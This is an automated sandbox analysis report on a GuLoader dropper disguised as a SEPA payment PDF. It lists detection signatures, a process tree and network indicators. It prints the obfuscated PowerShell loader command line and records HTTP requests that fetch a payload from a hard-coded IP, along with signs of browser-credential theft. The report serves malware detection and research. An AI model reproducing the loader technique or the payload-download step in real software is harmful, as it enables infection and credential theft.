Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pago SEPA.pdf.exe

Overview

General Information

Sample name:Pago SEPA.pdf.exe
Analysis ID:1556579
MD5:b09a414939191d7f43c114c02726ddb9
SHA1:2f9c6fef4c2a1b62e483a2cc70da3fb181b22b82
SHA256:32c90ef4f976a4da59bc95b23141547372640b04840e496852e80ee03c81b284
Tags:exeGuLoaderuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Pago SEPA.pdf.exe (PID: 3792 cmdline: "C:\Users\user\Desktop\Pago SEPA.pdf.exe" MD5: B09A414939191D7F43C114C02726DDB9)
    • powershell.exe (PID: 6508 cmdline: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3668 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • WmiPrvSE.exe (PID: 2472 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2604236409.000000000BBDF000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Double Extension File Execution
    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", CommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Pago SEPA.pdf.exe, NewProcessName: C:\Users\user\Desktop\Pago SEPA.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Pago SEPA.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", ProcessId: 3792, ProcessName: Pago SEPA.pdf.exe
    Sigma detected: Msiexec Initiated Connection
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.168.32.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3668, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49928
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , CommandLine: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago SEPA.pdf.exe", ParentImage: C:\Users\user\Desktop\Pago SEPA.pdf.exe, ParentProcessId: 3792, ParentProcessName: Pago SEPA.pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammenlimningers\Multipara168.Sel';$preallocators=$Alkamine36.SubString(1880,3);.$preallocators($Alkamine36)" , ProcessId: 6508, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T17:21:11.502558+010028032742Potentially Bad Traffic192.168.2.549967162.55.60.280TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-15T17:21:03.979116+010028032702Potentially Bad Traffic192.168.2.549928104.168.32.14080TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: Pago SEPA.pdf.exeReversingLabs: Detection: 47%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: Pago SEPA.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Pago SEPA.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: aqm.Core.pdb source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb" source: powershell.exe, 00000002.00000002.2601004631.00000000084D6000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: %]qm.Core.pdb<w> source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
    Source: unknownDNS query: name: showip.net
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49928 -> 104.168.32.140:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49967 -> 162.55.60.2:80
    Source: global trafficHTTP traffic detected: GET /jUPSCuLd221.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.32.140Cache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.32.140
    Source: global trafficHTTP traffic detected: GET /jUPSCuLd221.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 104.168.32.140Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
    Source: global trafficDNS traffic detected: DNS query: showip.net
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345062577.0000000006BD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://104.168.32.140/jUPSCuLd221.bin
    Source: powershell.exe, 00000002.00000002.2593527017.0000000007510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
    Source: Pago SEPA.pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net
    Source: msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C86000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/W
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/g
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netll
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.maxmind.com
    Source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.-h
    Source: powershell.exe, 00000002.00000002.2597839099.00000000083AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: msiexec.exe, 00000006.00000002.3345090343.0000000006C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
    Source: powershell.exe, 00000002.00000002.2588514134.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoftB
    Source: powershell.exe, 00000002.00000002.2597839099.0000000008380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoftBranchCache.psd1as
    Source: powershell.exe, 00000002.00000002.2591032297.0000000005D15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/?checkip=
    Source: msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/leaflet
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: msiexec.exe, 00000006.00000003.2741130608.0000000006CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: msiexec.exe, 00000006.00000002.3355904503.00000000229E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3345240394.0000000006CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755001524.00000000229E1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2755040323.0000000006CBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
    Source: msiexec.exe, 00000006.00000003.2754960395.0000000006CDB000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2754932824.00000000229F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openstreetmap.org/copyright
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_004052BD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052BD

    System Summary

    barindex
    Initial sample is a PE file and has a suspicious name
    Source: initial sampleStatic PE information: Filename: Pago SEPA.pdf.exe
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_004066E30_2_004066E3
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00404AFA0_2_00404AFA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0484DE582_2_0484DE58
    Source: Pago SEPA.pdf.exe, 00000000.00000000.2082635852.0000000000449000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameeuripidean.exe4 vs Pago SEPA.pdf.exe
    Source: Pago SEPA.pdf.exeBinary or memory string: OriginalFilenameeuripidean.exe4 vs Pago SEPA.pdf.exe
    Source: Pago SEPA.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Pago SEPA.pdf.exe, 00000000.00000003.2086726553.000000000284C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2591032297.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, Multipara168.Sel.0.drBinary or memory string: Defo meS Hydnocu UnwaillSneplovfFritstiiSkbnetitMennesktParaplyeMoromantRumania Bortska'Fairien5PeeningETopmejs1cycasesDNedgrav1Gangway6fodring1Viceroy5V jning1Storaaa8Ste.rke1trollmaBHoloq.i1Moho ho6Kvadrat4 Krligh0Stemmet3Bethleh8Udebliv1KeratoiFJetjage1Ta.nineDVialmak0 Na kom8Whis ys1Rejekti6Kokowai1Bjffers3Gooks o1A kitekDAlaress4Oversti8 Signif4 Kat st9Forvans4Dressma8Systemp5 Mas,inACentral4 Novelr7Bachelo5JavierbASharec 2Velart,1Kassevo3dyngvaaBPrimity0negroidAFloddel0Th xophAMar.hal3GoosehoE Arb.jd1Bloters5friheds1Anaphor7Rootedl1LigeancBArbejds1Retrack3hormone1Termins4teltstn2Subaera7hujalac4 Lanser0 Blgeto4Fremme,0 Gla ys3Afbind,9Cellu.o0Ulejl gFanraabe0Snippin8 Repell0Porc,la8 afs il1Alt,temF Vldens1 Jargon4 trafik0ExopathEMultifl3 PapevaEBrugerp1Stathen5 Streng1 Delpro7Strom t1StepdanBAffinde1Saalern3 .nremi1 Konve.4Erholde5 Mutsu 4Hjemkal3c eamleE Muggy,1Cirke bF latway1TelekomC Kornel1 pl,mat3Ostraci1Binocul4sk leek1Duplic F Wo,rie3A oilfoEA.renal0Ambulan3f iryfl1.slndin4Encefa 1SaggardB Tinghu1Hov.dst7Mi part1Boghyld3Wabbler1Ibrugta9Polysom3AmidoxyBReferen0Skvald 9Sporski0telef,n9Wellpoi1 OmmateFJannetr1Avedesn7Kompens1 Marg r8syt.aad1achroma6 Disadv0 Sarcos3Sportsm5Udstill2Jetware5Fremkal2Kapelle3My.eslu4Flummox1RobanddFPhascum0 HaeftiDSalonri5Frier d7 Tric p3Stueorg5 rel.ps1Seityjo8Impersa1Hormonb0Recipro1UdgydelFrealk,e1 Tingbo9konomis0sdvanerE P,elos5 SuperiA Kaskof2 orekno9Tamilet0Blkkl t3Di.ebru0Det.oni9Vanfreh0B.rtfraERami.or1SnyderiFCo gruo1Snipp t7devocal5 Besynd4 Kvarts2 Jakett8 Tolker1LimnantFBikuben1Progra,CUninhib1 Sensuo6opposit1 FlskegFFermata1Unsales9 cphory0ChilionEOpkalds1Fabr ks3 Skyde 1 agsan5Uran.ly1Landstp4.attleh5Th rlsp4bookdea3FrygiskBChufasu0U shame9Swaziln0Curette9Topmarg1Salgs iF Spessa1Greedkv7Lagerbe1Sammen,8 Inva,i1 Valle 6 libera0 Forto.3Lustful3Oprette4Slringe1SandpapB talsys1Overpro7 Vandhu1fr senbFHkke be5Cookseg2Pandlew5Coti ulETacheog2Hyperco9N.teman0QuiversFP eship0 BebudeAOutspa 1T glbrnFhazelhe0 Marca 8Violati1StereotB Dis.ri1 Velst.6 Helaar0FlotageE Eremit1 Ap neuBForvold0 Swineh8Fodfolk5skulaps3 Synchy5Terrine3 Standa5 Kapita6 suzi s5RationeA Ar ejd5By ueriERygtesg3SuperdiBHexprin0Hulmurs8udsonin0daediscEFuldrig1P.eshelFOrexism0Optagni8 Dolkha1Byudvik3Merogon1 Tank u5Ggepulv0 iddesAHylobat0ornithi8Dollare1 P.ovisF Reserv0Filform9Lflaske0 kadres9 Drlukn1Emonypr5Ultrada0O erstu8skolier1Kvadrat6Semimat0IndkaldFTidsskr1G,lante7Neocero1 V,vise3Morr,ws1 Oversi4Pedotro1 GasninBNo opti0Ailurid9Bnnes,a5 Minera3 Foa er5Systemt4Mucocel3ConcoctEl.sbeha1C chexiFafdr ve1FreightCKbs aae1 Vi eam3,aliera1Medicin4 Trise 1Kv ndelFHanknsp3 roponeE Increm0udfr sr3 Op.age1Antarkt4Sesquia1ForhaliBKdedesc1Tiptip,7bilagte1Int,gri3upgrowt1Afmeld.9Forfend3Sphero 7Sigmodo1Brendan5 Neomir1SdelighEAcridi,0 RorschFT rnero1Frostbi6,emicar1HushandFGastroe5Posteri2Krakele5FrkrigsESyn ige2ParaeneE arbour1Postero0Aground1PepitatFBloms r1Tiderko4Zazastw1EnstrenF Hel,ag1Pr,scie4Festsal1Deo.oriEFamil,e1HoslagtFAn ifer5Detailv6
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/13@1/2
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_0040457E GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040457E
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeFile created: C:\Users\user\AppData\Local\skydedreneJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
    Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsnCBD.tmpJump to behavior
    Source: Pago SEPA.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\Pago SEPA.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: msiexec.exe, 00000006.00000003.2741970159.0000000006CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2741683831.0000000006C9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2741434912.0000000006CBE000.00000004.00000020.00020000.00000000.sdmp, LogsootlessWXcJvVxgqogbJMtTgixrfxDDShIZGnaTWneuqdEfishspear.6.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
